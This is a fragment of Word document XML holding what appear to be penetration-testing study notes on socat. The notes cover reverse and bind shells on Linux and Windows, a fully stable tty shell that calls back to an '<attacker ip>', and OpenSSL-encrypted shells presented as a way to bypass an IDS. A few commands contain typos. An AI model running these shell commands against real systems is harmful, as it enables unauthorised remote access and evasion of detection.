        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Changing tty size must be done manually in reverse or bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A0294" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>open another terminal and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31519001" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>stty -a – note down values for “rows” and “columns”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E3E99" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in reverse/bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A842AF4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>stty rows &lt;number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70B565" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>stty cols &lt;number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBCCF8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allows programs such as text editors to correctly open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A230183" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDDA01" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>a connector between two points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A122EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>listening port and file, listening port and keyboard, two listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C560F3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2324FA02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat TCP-L:&lt;port&gt; -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C97ED40" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> socat TCP:&lt;local ip&gt;:&lt;local port&gt; EXEC:powershell.exe;pipes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7597E0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pipes forces powershell/cmd.exe to use unix style standard input and output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79504E3A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Linux equivalent – socat TCP:&lt;LOCAL IP&gt;:&lt;LOCAL PORT&gt; EXEC:”bash =li”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D60FD1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67298B6E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat TCP-L:&lt;PORT&gt; EXEC:”bash -li” – linux target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6F83E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat TCP-L:&lt;PORT&gt; EXEC:powershell.exe,pipes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE30F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">socat TCP:&lt;TARGET IP&gt;:&lt;TARGET PORT&gt; - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9A11E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Fully Stable Linux tty Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0496BB84" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>only works with Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A47299" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat TCP-L:&lt;PORT&gt; FILE:`tty`,raw,echo=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD218A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>connecting a listening port to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C6953" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>immediately stable and allocates a full tty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB165D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>target must have socat installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D27BA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>possible to upload a precompiled socat binary to be executed as normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09C1A5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat TCP:&lt;attacker ip&gt;:&lt;attacker port&gt; EXEC: “bash -li”,pty,stderr,sigint,setsid,sane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A569DD3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pty – allocates pseudoterminal on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F17B0B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>stderr – makes sure any error messages get shown in the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A5B92" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sigint – passes any Ctrl+C commands through into the sub-process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5667AC35" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>setsid – creates the process in a new session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246419F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sane – stabilizes the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C505ED5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>fully interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252E4B2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>can increase verbosity by including -d -d flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C8044" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Socat Encrypted Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D71976D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>both bind and reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB3200" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>cannot be spied on unless have decryption key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349F826" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bypass an IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1B4F5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>replace TCP with OPENSSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47C4BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>first generate certificate to use encrypted shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553672B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>openssl req - -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9B4A9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>creates a 2048 bit RSA key with matching cert file, valid for a year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884A1A5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>merge files into .pem file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A0026" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>cat shell.key shell.crt &gt; shell.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324770A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>setup reverse shell listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F78E2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat OPENSSL-LISTEN:&lt;PORT&gt;,cert=shell.pem,verify=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16427F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
